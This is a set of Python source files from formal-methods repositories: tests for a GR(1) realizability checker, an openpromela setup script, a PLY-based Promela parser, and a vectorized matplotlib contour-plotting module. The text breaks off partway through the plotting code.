{
"source": "johnyf/gr1py",
"score": 3
}
#### File: gr1py/tests/test_minnx.py
```python
from gr1py.minnx import DiGraph
class DiGraph_test(object):
def setUp(self):
self.G = DiGraph()
def tearDown(self):
self.G = None
def test_add_remove_nodes(self):
assert self.G.number_of_nodes() == 0
self.G.add_node(0)
assert self.G.number_of_nodes() == 1
self.G.add_nodes_from(range(10))
assert self.G.number_of_nodes() == 10
self.G.remove_node(0)
assert self.G.number_of_nodes() == 9
def test_add_remove_edges(self):
assert self.G.number_of_nodes() == 0
self.G.add_edge(0,1)
assert self.G.number_of_nodes() == 2
self.G.add_edge(0,2)
assert self.G.number_of_nodes() == 3
self.G.remove_edge(0,1)
assert self.G.number_of_nodes() == 3
assert self.G.has_edge(0, 2) and not self.G.has_edge(0, 1)
def test_add_remove_edges_from(self):
assert self.G.number_of_nodes() == 0
self.G.add_edges_from([(0,1), (0,2)])
assert self.G.number_of_nodes() == 3
self.G.add_edges_from([(0,1), (1,3)])
assert self.G.number_of_nodes() == 4
self.G.remove_edges_from([(0,2), (0,1)])
assert self.G.number_of_nodes() == 4
assert self.G.has_edge(1, 3)
assert not self.G.has_edge(0, 2) and not self.G.has_edge(0, 1)
```
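The `gr1py.minnx.DiGraph` API exercised by these tests can also be used directly; a minimal sketch, assuming `gr1py` is installed:
```python
# Minimal sketch of the DiGraph methods covered by the tests above.
from gr1py.minnx import DiGraph

g = DiGraph()
g.add_edges_from([(0, 1), (0, 2)])   # endpoints are added as nodes
g.remove_edge(0, 1)                  # removes the edge, keeps the nodes
assert g.number_of_nodes() == 3
assert g.has_edge(0, 2) and not g.has_edge(0, 1)
```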
#### File: gr1py/tests/test_realizability.py
```python
import gr1py.cli
from gr1py.solve import check_realizable
ARBITER1_SPC_GR1C = """
ENV: r1;
SYS: g1;
ENVINIT: !r1;
ENVTRANS:
[](((r1 & !g1) | (!r1 & g1)) -> ((r1' & r1) | (!r1' & !r1)));
ENVGOAL:
[]<>!(r1 & g1);
SYSINIT: !g1;
SYSTRANS:
[](((r1 & g1) | (!r1 & !g1)) -> ((g1 & g1') | (!g1 & !g1')));
SYSGOAL:
[]<>((r1 & g1) | (!r1 & !g1));
"""
def check_check_realizable(tsys, exprtab, expected):
assert check_realizable(tsys, exprtab) == expected
def test_check_realizable():
for spcstr, expected in [(ARBITER1_SPC_GR1C, True),
('SYS:x;', True),
('SYS: x;\nSYSGOAL: []<>False;', False)]:
tsys, exprtab = gr1py.cli.loads(spcstr)
yield check_check_realizable, tsys, exprtab, expected
```
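The `yield`-based generator test above is a `nose` idiom that `pytest` no longer collects; an equivalent parametrized test might look like the following sketch (assumes `pytest` and `gr1py` are installed; the `ARBITER1_SPC_GR1C` string above could be added as a third case):
```python
# Hypothetical pytest-style rewrite of the nose generator test above.
import pytest

import gr1py.cli
from gr1py.solve import check_realizable


@pytest.mark.parametrize('spcstr, expected', [
    ('SYS: x;', True),
    ('SYS: x;\nSYSGOAL: []<>False;', False)])
def test_check_realizable(spcstr, expected):
    tsys, exprtab = gr1py.cli.loads(spcstr)
    assert check_realizable(tsys, exprtab) == expected
```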
{
"source": "johnyf/openpromela",
"score": 2
}
#### File: johnyf/openpromela/setup.py
```python
from setuptools import setup
# inline:
# from openpromela import logic
# import git
description = (
'Generalized reactive(1) synthesis from Promela specifications.')
README = 'README.md'
VERSION_FILE = 'openpromela/_version.py'
MAJOR = 0
MINOR = 1
MICRO = 1
VERSION = '{major}.{minor}.{micro}'.format(
major=MAJOR, minor=MINOR, micro=MICRO)
VERSION_TEXT = (
'# This file was generated from setup.py\n'
"version = '{version}'\n")
install_requires = [
'dd >= 0.3.0',
'networkx >= 1.9.1',
'omega >= 0.0.7',
'ply >= 3.4',
'promela >= 0.0.1']
def git_version(version):
import git
repo = git.Repo('.git')
repo.git.status()
sha = repo.head.commit.hexsha
if repo.is_dirty():
return '{v}.dev0+{sha}.dirty'.format(
v=version, sha=sha)
# commit is clean
# is it release of `version` ?
try:
tag = repo.git.describe(
match='v[0-9]*', exact_match=True,
tags=True, dirty=True)
except git.GitCommandError:
return '{v}.dev0+{sha}'.format(
v=version, sha=sha)
assert tag[1:] == version, (tag, version)
return version
def build_parser_table():
from openpromela import logic
tabmodule = logic.TABMODULE.split('.')[-1]
outputdir = 'openpromela/'
parser = logic.Parser()
parser.build(tabmodule, outputdir=outputdir, write_tables=True)
if __name__ == '__main__':
# version
try:
version = git_version(VERSION)
except:
print('No git info: Assume release.')
version = VERSION
s = VERSION_TEXT.format(version=version)
with open(VERSION_FILE, 'w') as f:
f.write(s)
# build parsers
try:
build_parser_table()
except ImportError:
print('WARNING: `openpromela` could not cache parser tables '
'(ignore this if running only for "egg_info").')
setup(
name='openpromela',
version=version,
description=description,
long_description=open(README).read(),
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/johnyf/openpromela',
license='BSD',
install_requires=install_requires,
tests_require=['nose'],
packages=['openpromela'],
package_dir={'openpromela': 'openpromela'},
entry_points={
'console_scripts':
['ospin = openpromela.logic:command_line_wrapper']})
```
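For reference, a small sketch of what this script writes to `openpromela/_version.py`, and of the version strings that `git_version` can return (the commit SHA is a placeholder, not a real value):
```python
# Illustrative only: the version strings assembled by the setup script above.
VERSION_TEXT = (
    '# This file was generated from setup.py\n'
    "version = '{version}'\n")
print(VERSION_TEXT.format(version='0.1.1'), end='')
# prints:
#   # This file was generated from setup.py
#   version = '0.1.1'
#
# git_version('0.1.1') returns one of (hexsha shown is hypothetical):
#   '0.1.1'                      # clean checkout at the release tag v0.1.1
#   '0.1.1.dev0+<hexsha>'        # clean checkout without a release tag
#   '0.1.1.dev0+<hexsha>.dirty'  # working tree has uncommitted changes
```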
{
"source": "johnyf/promela",
"score": 2
}
#### File: promela/promela/yacc.py
```python
from __future__ import absolute_import
from __future__ import division
import errno
import logging
import os
import subprocess
import warnings
import ply.yacc
# inline
#
# import promela.ast as promela_ast
# from promela import lex
TABMODULE = 'promela.promela_parsetab'
logger = logging.getLogger(__name__)
class Parser(object):
"""Production rules for Promela parser."""
logger = logger
tabmodule = TABMODULE
start = 'program'
# http://spinroot.com/spin/Man/operators.html
# spin.y
# lowest to highest
precedence = (
('right', 'EQUALS'),
('left', 'TX2', 'RCV', 'R_RCV'),
('left', 'IMPLIES', 'EQUIV'),
('left', 'LOR'),
('left', 'LAND'),
('left', 'ALWAYS', 'EVENTUALLY'),
('left', 'UNTIL', 'WEAK_UNTIL', 'RELEASE'),
('right', 'NEXT'),
('left', 'OR'),
('left', 'XOR'),
('left', 'AND'),
('left', 'EQ', 'NE'),
('left', 'LT', 'LE', 'GT', 'GE'),
('left', 'LSHIFT', 'RSHIFT'),
('left', 'PLUS', 'MINUS'),
('left', 'TIMES', 'DIVIDE', 'MOD'),
('left', 'INCR', 'DECR'),
('right', 'LNOT', 'NOT', 'UMINUS', 'NEG'), # LNOT is also SND
('left', 'DOT'),
('left', 'LPAREN', 'RPAREN', 'LBRACKET', 'RBRACKET'))
def __init__(self, ast=None, lexer=None):
if ast is None:
import promela.ast as ast
if lexer is None:
from promela import lex
lexer = lex.Lexer()
self.lexer = lexer
self.ast = ast
self.tokens = self.lexer.tokens
self.build()
def build(self, tabmodule=None, outputdir='', write_tables=False,
debug=False, debuglog=None, errorlog=None):
"""Build parser using `ply.yacc`.
Default table module is `self.tabmodule`.
Module logger used as default debug logger.
Default error logger is that created by PLY.
"""
if tabmodule is None:
tabmodule = self.tabmodule
if debug and debuglog is None:
debuglog = self.logger
self.parser = ply.yacc.yacc(
method='LALR',
module=self,
start=self.start,
tabmodule=tabmodule,
outputdir=outputdir,
write_tables=write_tables,
debug=debug,
debuglog=debuglog,
errorlog=errorlog)
def parse(self, promela):
"""Parse string of Promela code."""
s = cpp(promela)
program = self.parser.parse(
s, lexer=self.lexer.lexer, debug=self.logger)
return program
def _iter(self, p):
if p[2] is not None:
p[1].append(p[2])
return p[1]
def _end(self, p):
if p[1] is None:
return list()
else:
return [p[1]]
# Top-level constructs
# ====================
def p_program(self, p):
"""program : units"""
p[0] = self.ast.Program(p[1])
def p_units_iter(self, p):
"""units : units unit"""
p[0] = self._iter(p)
def p_units_end(self, p):
"""units : unit"""
p[0] = self._end(p)
# TODO: events, c_fcts, ns, error
def p_unit_proc(self, p):
"""unit : proc
| init
| claim
| ltl
"""
p[0] = p[1]
def p_unit_decl(self, p):
"""unit : one_decl
| utype
"""
p[0] = p[1]
def p_unit_semi(self, p):
"""unit : semi"""
def p_proc(self, p):
("""proc : prefix_proctype NAME"""
""" LPAREN decl RPAREN"""
""" opt_priority opt_enabler"""
""" body
""")
inst = p[1]
name = p[2]
args = p[4]
priority = p[6]
enabler = p[7]
body = p[8]
p[0] = self.ast.Proctype(
name, body, args=args, priority=priority,
provided=enabler, **inst)
# instantiator
def p_inst(self, p):
"""prefix_proctype : ACTIVE opt_index proctype"""
d = p[3]
if p[2] is None:
n_active = self.ast.Integer('1')
else:
n_active = p[2]
d['active'] = n_active
p[0] = d
def p_inactive_proctype(self, p):
"""prefix_proctype : proctype"""
p[0] = p[1]
def p_opt_index(self, p):
"""opt_index : LBRACKET expr RBRACKET
| LBRACKET NAME RBRACKET
"""
p[0] = p[2]
def p_opt_index_empty(self, p):
"""opt_index : empty"""
def p_init(self, p):
"""init : INIT opt_priority body"""
p[0] = self.ast.Init(name='init', body=p[3], priority=p[2])
def p_claim(self, p):
"""claim : CLAIM optname body"""
name = p[2] if p[2] else 'never'
p[0] = self.ast.NeverClaim(name=name, body=p[3])
# user-defined type
def p_utype(self, p):
"""utype : TYPEDEF NAME LBRACE decl_lst RBRACE"""
seq = self.ast.Sequence(p[4])
p[0] = self.ast.TypeDef(p[2], seq)
def p_ltl(self, p):
"""ltl : LTL LBRACE expr RBRACE"""
p[0] = self.ast.LTL(p[3])
# Declarations
# ============
def p_decl(self, p):
"""decl : decl_lst"""
p[0] = self.ast.Sequence(p[1])
def p_decl_empty(self, p):
"""decl : empty"""
def p_decl_lst_iter(self, p):
"""decl_lst : one_decl SEMI decl_lst"""
p[0] = [p[1]] + p[3]
def p_decl_lst_end(self, p):
"""decl_lst : one_decl"""
p[0] = [p[1]]
def p_one_decl_visible(self, p):
"""one_decl : vis typename var_list
| vis NAME var_list
"""
visible = p[1]
typ = p[2]
var_list = p[3]
p[0] = self.one_decl(typ, var_list, visible)
def p_one_decl(self, p):
"""one_decl : typename var_list
| NAME var_list
"""
typ = p[1]
var_list = p[2]
p[0] = self.one_decl(typ, var_list)
def one_decl(self, typ, var_list, visible=None):
c = list()
for d in var_list:
v = self.ast.VarDef(vartype=typ, visible=visible, **d)
c.append(v)
return self.ast.Sequence(c)
# message type declaration
def p_one_decl_mtype_vis(self, p):
"""one_decl : vis MTYPE asgn LBRACE name_list RBRACE"""
p[0] = self.ast.MessageType(p[5], visible=p[1])
def p_one_decl_mtype(self, p):
"""one_decl : MTYPE asgn LBRACE name_list RBRACE"""
p[0] = self.ast.MessageType(p[3])
def p_name_list_iter(self, p):
"""name_list : name_list COMMA NAME"""
p[1].append(p[3])
p[0] = p[1]
def p_name_list_end(self, p):
"""name_list : NAME"""
p[0] = [p[1]]
def p_var_list_iter(self, p):
"""var_list : ivar COMMA var_list"""
p[0] = [p[1]] + p[3]
def p_var_list_end(self, p):
"""var_list : ivar"""
p[0] = [p[1]]
# TODO: vardcl asgn LBRACE c_list RBRACE
# ivar = initialized variable
def p_ivar(self, p):
"""ivar : vardcl"""
p[0] = p[1]
def p_ivar_asgn(self, p):
"""ivar : vardcl asgn expr"""
expr = self.ast.Expression(p[3])
p[1]['initval'] = expr
p[0] = p[1]
def p_vardcl(self, p):
"""vardcl : NAME"""
p[0] = {'name': p[1]}
# p.403, SPIN manual
def p_vardcl_unsigned(self, p):
"""vardcl : NAME COLON const"""
p[0] = {'name': p[1], 'bitwidth': p[3]}
def p_vardcl_array(self, p):
"""vardcl : NAME LBRACKET const_expr RBRACKET"""
p[0] = {'name': p[1], 'length': p[3]}
def p_vardcl_chan(self, p):
"""vardcl : vardcl EQUALS ch_init"""
p[1].update(p[3])
p[0] = p[1]
def p_typename(self, p):
"""typename : BIT
| BOOL
| BYTE
| CHAN
| INT
| PID
| SHORT
| UNSIGNED
| MTYPE
"""
p[0] = p[1]
def p_ch_init(self, p):
("""ch_init : LBRACKET const_expr RBRACKET """
""" OF LBRACE typ_list RBRACE""")
p[0] = {'length': p[2], 'msg_types': p[6]}
def p_typ_list_iter(self, p):
"""typ_list : typ_list COMMA basetype"""
p[1].append(p[3])
p[0] = p[1]
def p_typ_list_end(self, p):
"""typ_list : basetype"""
p[0] = [p[1]]
# TODO: | UNAME | error
def p_basetype(self, p):
"""basetype : typename"""
p[0] = p[1]
# References
# ==========
def p_varref(self, p):
"""varref : cmpnd"""
p[0] = p[1]
def p_cmpnd_iter(self, p):
"""cmpnd : cmpnd PERIOD cmpnd %prec DOT"""
p[0] = self.ast.VarRef(extension=p[3], **p[1])
def p_cmpnd_end(self, p):
"""cmpnd : pfld"""
p[0] = self.ast.VarRef(**p[1])
# pfld = prefix field
def p_pfld_indexed(self, p):
"""pfld : NAME LBRACKET expr RBRACKET"""
p[0] = {'name': p[1], 'index': p[3]}
def p_pfld(self, p):
"""pfld : NAME"""
p[0] = {'name': p[1]}
# Attributes
# ==========
def p_opt_priority(self, p):
"""opt_priority : PRIORITY number"""
p[0] = p[2]
def p_opt_priority_empty(self, p):
"""opt_priority : empty"""
def p_opt_enabler(self, p):
"""opt_enabler : PROVIDED LPAREN expr RPAREN"""
p[0] = p[3]
def p_opt_enabler_empty(self, p):
"""opt_enabler : empty"""
def p_body(self, p):
"""body : LBRACE sequence os RBRACE"""
p[0] = p[2]
# Sequence
# ========
def p_sequence(self, p):
"""sequence : sequence msemi step"""
p[1].append(p[3])
p[0] = p[1]
def p_sequence_ending_with_atomic(self, p):
"""sequence : seq_block step"""
p[1].append(p[2])
p[0] = p[1]
def p_sequence_single(self, p):
"""sequence : step"""
p[0] = self.ast.Sequence([p[1]])
def p_seq_block(self, p):
"""seq_block : sequence msemi atomic
| sequence msemi dstep
"""
p[1].append(p[3])
p[0] = p[1]
def p_seq_block_iter(self, p):
"""seq_block : seq_block atomic
| seq_block dstep
"""
p[1].append(p[2])
p[0] = p[1]
def p_seq_block_single(self, p):
"""seq_block : atomic
| dstep
"""
p[0] = [p[1]]
# TODO: XU vref_lst
def p_step_1(self, p):
"""step : one_decl
| stmnt
"""
p[0] = p[1]
def p_step_labeled(self, p):
"""step : NAME COLON one_decl"""
raise Exception(
'label preceding declaration: {s}'.format(s=p[3]))
def p_step_3(self, p):
"""step : NAME COLON XR
| NAME COLON XS
"""
raise Exception(
'label preceding xr/xs claim')
def p_step_4(self, p):
"""step : stmnt UNLESS stmnt"""
p[0] = (p[1], 'unless', p[3])
self.logger.warning('UNLESS not interpreted yet')
# Statement
# =========
def p_stmnt(self, p):
"""stmnt : special
| statement
"""
p[0] = p[1]
# Stmnt in spin.y
def p_statement_asgn(self, p):
"""statement : varref asgn full_expr"""
p[0] = self.ast.Assignment(var=p[1], value=p[3])
def p_statement_incr(self, p):
"""statement : varref INCR"""
one = self.ast.Integer('1')
expr = self.ast.Expression(self.ast.Binary('+', p[1], one))
p[0] = self.ast.Assignment(p[1], expr)
def p_statement_decr(self, p):
"""statement : varref DECR"""
one = self.ast.Integer('1')
expr = self.ast.Expression(self.ast.Binary('-', p[1], one))
p[0] = self.ast.Assignment(p[1], expr)
def p_statement_assert(self, p):
"""statement : ASSERT full_expr"""
p[0] = self.ast.Assert(p[2])
def p_statement_fifo_receive(self, p):
"""statement : varref RCV rargs"""
p[0] = self.ast.Receive(p[1], p[3])
def p_statement_copy_fifo_receive(self, p):
"""statement : varref RCV LT rargs GT"""
p[0] = self.ast.Receive(p[1], p[4])
def p_statement_random_receive(self, p):
"""statement : varref R_RCV rargs"""
p[0] = self.ast.Receive(p[1], p[3])
def p_statement_copy_random_receive(self, p):
"""statement : varref R_RCV LT rargs GT"""
p[0] = self.ast.Receive(p[1], p[4])
def p_statement_tx2(self, p):
"""statement : varref TX2 margs"""
p[0] = self.ast.Send(p[1], p[3])
def p_statement_full_expr(self, p):
"""statement : full_expr"""
p[0] = p[1]
def p_statement_else(self, p):
"""statement : ELSE"""
p[0] = self.ast.Else()
def p_statement_atomic(self, p):
"""statement : atomic"""
p[0] = p[1]
def p_atomic(self, p):
"""atomic : ATOMIC LBRACE sequence os RBRACE"""
s = p[3]
s.context = 'atomic'
p[0] = s
def p_statement_dstep(self, p):
"""statement : dstep"""
p[0] = p[1]
def p_dstep(self, p):
"""dstep : D_STEP LBRACE sequence os RBRACE"""
s = p[3]
s.context = 'd_step'
p[0] = s
def p_statement_braces(self, p):
"""statement : LBRACE sequence os RBRACE"""
p[0] = p[2]
# the stmt of line 696 in spin.y collects the inline ?
def p_statement_call(self, p):
"""statement : NAME LPAREN args RPAREN"""
# NAME = INAME = inline
c = self.ast.Inline(p[1], p[3])
p[0] = self.ast.Sequence([c])
def p_statement_assgn_call(self, p):
"""statement : varref asgn NAME LPAREN args RPAREN statement"""
inline = self.ast.Inline(p[3], p[5])
p[0] = self.ast.Assignment(p[1], inline)
def p_statement_return(self, p):
"""statement : RETURN full_expr"""
p[0] = self.ast.Return(p[2])
def p_printf(self, p):
"""statement : PRINT LPAREN STRING prargs RPAREN"""
p[0] = self.ast.Printf(p[3], p[4])
# yet unimplemented for statement:
# SET_P l_par two_args r_par
# PRINTM l_par varref r_par
# PRINTM l_par CONST r_par
# ccode
# Special
# =======
def p_special(self, p):
"""special : varref RCV"""
p[0] = self.ast.Receive(p[1])
def p_varref_lnot(self, p):
"""special : varref LNOT margs"""
raise NotImplementedError
def p_break(self, p):
"""special : BREAK"""
p[0] = self.ast.Break()
def p_goto(self, p):
"""special : GOTO NAME"""
p[0] = self.ast.Goto(p[2])
def p_labeled_stmt(self, p):
"""special : NAME COLON stmnt"""
p[0] = self.ast.Label(p[1], p[3])
def p_labeled(self, p):
"""special : NAME COLON"""
p[0] = self.ast.Label(
p[1],
self.ast.Expression(self.ast.Bool('true')))
def p_special_if(self, p):
"""special : IF options FI"""
p[0] = self.ast.Options('if', p[2])
def p_special_do(self, p):
"""special : DO options OD"""
p[0] = self.ast.Options('do', p[2])
def p_options_end(self, p):
"""options : option"""
p[0] = [p[1]]
def p_options_iter(self, p):
"""options : options option"""
p[1].append(p[2])
p[0] = p[1]
def p_option(self, p):
"""option : COLONS sequence os"""
s = p[2]
s.is_option = True
p[0] = s
# Expressions
# ===========
def p_full_expr(self, p):
"""full_expr : expr
| pexpr
"""
p[0] = self.ast.Expression(p[1])
# probe expr = no negation allowed (positive)
def p_pexpr(self, p):
"""pexpr : probe
| LPAREN pexpr RPAREN
| pexpr LAND pexpr
| pexpr LAND expr
| expr LAND pexpr
| pexpr LOR pexpr
| pexpr LOR expr
| expr LOR pexpr
"""
p[0] = 'pexpr'
def p_probe(self, p):
"""probe : FULL LPAREN varref RPAREN
| NFULL LPAREN varref RPAREN
| EMPTY LPAREN varref RPAREN
| NEMPTY LPAREN varref RPAREN
"""
p[0] = 'probe'
def p_expr_paren(self, p):
"""expr : LPAREN expr RPAREN"""
p[0] = p[2]
def p_expr_arithmetic(self, p):
"""expr : expr PLUS expr
| expr MINUS expr
| expr TIMES expr
| expr DIVIDE expr
| expr MOD expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
def p_expr_not(self, p):
"""expr : NOT expr
| MINUS expr %prec UMINUS
| LNOT expr %prec NEG
"""
p[0] = self.ast.Unary(p[1], p[2])
def p_expr_logical(self, p):
"""expr : expr AND expr
| expr OR expr
| expr XOR expr
| expr LAND expr
| expr LOR expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
# TODO: cexpr
def p_expr_shift(self, p):
"""expr : expr LSHIFT expr
| expr RSHIFT expr
"""
p[0] = p[1]
def p_expr_const_varref(self, p):
"""expr : const
| varref
"""
p[0] = p[1]
def p_expr_varref(self, p):
"""expr : varref RCV LBRACKET rargs RBRACKET
| varref R_RCV LBRACKET rargs RBRACKET
"""
p[0] = p[1]
warnings.warn('not implemented')
def p_expr_other(self, p):
"""expr : LPAREN expr ARROW expr COLON expr RPAREN
| LEN LPAREN varref RPAREN
| ENABLED LPAREN expr RPAREN
| GET_P LPAREN expr RPAREN
"""
p[0] = p[1]
warnings.warn('"{s}" not implemented'.format(s=p[1]))
def p_expr_run(self, p):
"""expr : RUN aname LPAREN args RPAREN opt_priority"""
p[0] = self.ast.Run(p[2], p[4], p[6])
def p_expr_other_2(self, p):
"""expr : TIMEOUT
| NONPROGRESS
| PC_VAL LPAREN expr RPAREN
"""
raise NotImplementedError()
def p_expr_remote_ref_proctype_pc(self, p):
"""expr : NAME AT NAME
"""
p[0] = self.ast.RemoteRef(p[1], p[3])
def p_expr_remote_ref_pid_pc(self, p):
"""expr : NAME LBRACKET expr RBRACKET AT NAME"""
p[0] = self.ast.RemoteRef(p[1], p[6], pid=p[3])
def p_expr_remote_ref_var(self, p):
"""expr : NAME LBRACKET expr RBRACKET COLON pfld"""
# | NAME COLON pfld %prec DOT2
raise NotImplementedError()
def p_expr_comparator(self, p):
"""expr : expr EQ expr
| expr NE expr
| expr LT expr
| expr LE expr
| expr GT expr
| expr GE expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
def p_binary_ltl_expr(self, p):
"""expr : expr UNTIL expr
| expr WEAK_UNTIL expr
| expr RELEASE expr
| expr IMPLIES expr
| expr EQUIV expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
def p_unary_ltl_expr(self, p):
"""expr : NEXT expr
| ALWAYS expr
| EVENTUALLY expr
"""
p[0] = self.ast.Unary(p[1], p[2])
# Constants
# =========
def p_const_expr_const(self, p):
"""const_expr : const"""
p[0] = p[1]
def p_const_expr_unary(self, p):
"""const_expr : MINUS const_expr %prec UMINUS"""
p[0] = self.ast.Unary(p[1], p[2])
def p_const_expr_binary(self, p):
"""const_expr : const_expr PLUS const_expr
| const_expr MINUS const_expr
| const_expr TIMES const_expr
| const_expr DIVIDE const_expr
| const_expr MOD const_expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
def p_const_expr_paren(self, p):
"""const_expr : LPAREN const_expr RPAREN"""
p[0] = p[2]
def p_const(self, p):
"""const : boolean
| number
"""
# lex maps `skip` to `TRUE`
p[0] = p[1]
def p_bool(self, p):
"""boolean : TRUE
| FALSE
"""
p[0] = self.ast.Bool(p[1])
def p_number(self, p):
"""number : INTEGER"""
p[0] = self.ast.Integer(p[1])
# Auxiliary
# =========
def p_two_args(self, p):
"""two_args : expr COMMA expr"""
def p_args(self, p):
"""args : arg"""
p[0] = p[1]
def p_prargs(self, p):
"""prargs : COMMA arg"""
p[0] = p[2]
def p_prargs_empty(self, p):
"""prargs : empty"""
def p_args_empty(self, p):
"""args : empty"""
def p_margs(self, p):
"""margs : arg
| expr LPAREN arg RPAREN
"""
def p_arg(self, p):
"""arg : expr
| expr COMMA arg
"""
p[0] = 'arg'
# TODO: CONST, MINUS CONST %prec UMIN
def p_rarg(self, p):
"""rarg : varref
| EVAL LPAREN expr RPAREN
"""
p[0] = 'rarg'
def p_rargs(self, p):
"""rargs : rarg
| rarg COMMA rargs
| rarg LPAREN rargs RPAREN
| LPAREN rargs RPAREN
"""
def p_proctype(self, p):
"""proctype : PROCTYPE
| D_PROCTYPE
"""
if p[1] == 'proctype':
p[0] = dict(d_proc=False)
else:
p[0] = dict(d_proc=True)
# PNAME
def p_aname(self, p):
"""aname : NAME"""
p[0] = p[1]
# optional name
def p_optname(self, p):
"""optname : NAME"""
p[0] = p[1]
def p_optname_empty(self, p):
"""optname : empty"""
# optional semi
def p_os(self, p):
"""os : empty
| semi
"""
p[0] = ';'
# multi-semi
def p_msemi(self, p):
"""msemi : semi
| msemi semi
"""
p[0] = ';'
def p_semi(self, p):
"""semi : SEMI
| ARROW
"""
p[0] = ';'
def p_asgn(self, p):
"""asgn : EQUALS
| empty
"""
p[0] = None
def p_visible(self, p):
"""vis : HIDDEN
| SHOW
| ISLOCAL
"""
p[0] = {'visible': p[1]}
def p_empty(self, p):
"""empty : """
def p_error(self, p):
raise Exception('syntax error at: {p}'.format(p=p))
def cpp(s):
"""Call the C{C} preprocessor with input C{s}."""
try:
p = subprocess.Popen(['cpp', '-E', '-x', 'c'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
except OSError as e:
        if e.errno == errno.ENOENT:
raise Exception('C preprocessor (cpp) not found in path.')
else:
raise
logger.debug('cpp input:\n' + s)
stdout, stderr = p.communicate(s)
logger.debug('cpp returned: {c}'.format(c=p.returncode))
logger.debug('cpp stdout:\n {out}'.format(out=stdout))
return stdout
def rebuild_table(parser, tabmodule):
# log details to file
h = logging.FileHandler('log.txt', mode='w')
debuglog = logging.getLogger()
debuglog.addHandler(h)
debuglog.setLevel('DEBUG')
import os
outputdir = './'
# rm table files to force rebuild to get debug output
tablepy = tabmodule + '.py'
tablepyc = tabmodule + '.pyc'
try:
os.remove(tablepy)
except:
print('no "{t}" found'.format(t=tablepy))
try:
os.remove(tablepyc)
except:
print('no "{t}" found'.format(t=tablepyc))
parser.build(tabmodule, outputdir=outputdir,
write_tables=True, debug=True,
debuglog=debuglog)
if __name__ == '__main__':
rebuild_table(Parser(), TABMODULE.split('.')[-1])
# TODO
#
# expr << expr
# expr >> expr
# (expr -> expr : expr)
# run func(args) priority
# len(varref)
# enabled(expr)
# get_p(expr)
# var ? [rargs]
# var ?? [rargs]
# timeout
# nonprogress
# pc_val(expr)
# name[expr] @ name
# name[expr] : pfld
# name @ name
# name : pfld
```
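A usage sketch for the parser above, assuming the `promela` package is installed and a C preprocessor (`cpp`) is on the `PATH`, since `Parser.parse` pipes its input through `cpp`; the toy model is illustrative:
```python
# Parse a small Promela model into an AST (sketch).
from promela import yacc

PROMELA_CODE = '''
bit x;
active proctype toggle() {
    do
    :: x = 1
    :: x = 0
    od
}
'''

parser = yacc.Parser()
program = parser.parse(PROMELA_CODE)
print(program)  # a `promela.ast.Program` instance
```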
{
"source": "johnyf/pyvectorized",
"score": 3
}
#### File: pyvectorized/pyvectorized/vectorized_plot.py
```python
from __future__ import division
from warnings import warn
import numpy as np
from matplotlib import pyplot as plt
#from mayavi import mlab
from multi_plot import newax
from vectorized_meshgrid import domain2vec, vec2meshgrid, res2meshsize
from multidim_plot import quiver
def ezquiver(
func,
domain = np.array([0, 1, 0, 1]).reshape(1, -1),
resolution = np.array([30, 29]).reshape(1, -1),
ax = None,
*args, **kwargs
):
"""Vectorized quiver for functions with vector args.
@param func: function handle
@param domain: rectangular plotting domain
= [xmin, xmax, ymin, ymax]
@param resolution: grid spacing
= [nx, ny]
@param ax: axes object handle
@param args: positional arguments forwarded to func
@param kwargs: key-value args for func
"""
if ax is None:
ax = newax()
q = domain2vec(domain, resolution)
v = feval(func, q, **kwargs)
quiver(ax, q, v)
def contour(q, z, res, ax=None, **kwargs):
"""Vectorized wrapper for contour plot.
@param q: coordinates of contour points
@type q: [2 x #points]
@param z: row vector of scalar function
@type z: [1 x #points]
@param res: resolution of contour
@type res: [nx, ny]
@param ax: axes object handle
@param kwargs: passed to contour function as given, see its help
@return: h = handle to contour object created.
"""
if ax is None:
ax = newax()
# multiple axes ?
try:
contours = []
for curax in ax:
            cont = contour(q, z, res, ax=curax, **kwargs)
contours.append(cont)
return contours
except:
pass
# enough dimensions ?
ndim = q.shape[0]
if ndim < 2:
raise Exception('space dim = q.shape[0] = 1.')
res = res2meshsize(res)
# Z ?
if z is None:
        z = np.zeros((1, q.shape[1]))
elif z is np.NaN:
z = 5 * np.random.rand(1, q.shape[1])
else:
z = z * np.ones([1, q.shape[1] ])
X, Y = vec2meshgrid(q, res) # nargout=2
Z, = vec2meshgrid(z, res)
# calc
if ndim < 3:
cont = ax.contour(X, Y, Z, 100, **kwargs)
else:
raise Exception('Dimension of vector q is not 2.')
return cont
def contourf(q, z, res, ax=None, **kwargs):
"""Vectorized filled contour plot.
@param q: coordinates of contour points
@type q: [2 x #points] |
@param z: row vector of scalar function
@type z: [1 x #points]
@param res: resolution of contour
@type res: [nx, ny]
@param ax: axes object handle
@return: h = handle to filled contour
"""
if ax is None:
ax = newax()
# multiple axes ?
try:
contours = []
for curax in ax:
            cont = contourf(q, z, res, ax=curax, **kwargs)
contours.append(cont)
return contours
except:
pass
# enough dimensions ?
ndim = q.shape[0]
if ndim < 2:
raise Exception('space dim = q.shape[0] = 1.')
res = res2meshsize(res)
# Z ?
if z is None:
        z = np.zeros((1, q.shape[1]))
elif z is np.NaN:
z = 5 * np.random.rand(1, q.shape[1])
else:
z = z * np.ones([1, q.shape[1] ])
X, Y = vec2meshgrid(q, res) # nargout=2
Z, = vec2meshgrid(z, res)
# calc
if ndim < 3:
cont = ax.contourf(X, Y, Z, 25, **kwargs)
else:
raise Exception('Dimension of vector q is not 2.')
return cont
def ezcontour(func, ax, domain, resolution,
values, **kwargs):
"""Vectorized easy contour,
for functions accepting vector arguments.
@param ax: axes object handle
@param func: function handle
@param domain: rectangular plotting domain
@type domain: [xmin, xmax, ymin, ymax]
@param resolution: grid spacing
@type resolution: [nx, ny]
@param values: level set values
@type values: [v1, v2, ..., vN]
@param kwargs: additional arguments for
input to func
"""
# which axes ?
    if (0 in ax.shape):
        warn('Axes object handle ax is empty, no plot.')
        return
    # which domain ?
    if domain is None:
        domain = np.array([0, 1, 0, 1]).reshape(1, -1)
    # at what grid resolution ?
    if resolution is None:
        resolution = np.array([30, 29]).reshape(1, -1)
    elif 0 in resolution.shape:
        resolution = np.array([30, 29]).reshape(1, -1)
    # which level sets ?
    if values is None:
        values = np.array([])
    # compute surface
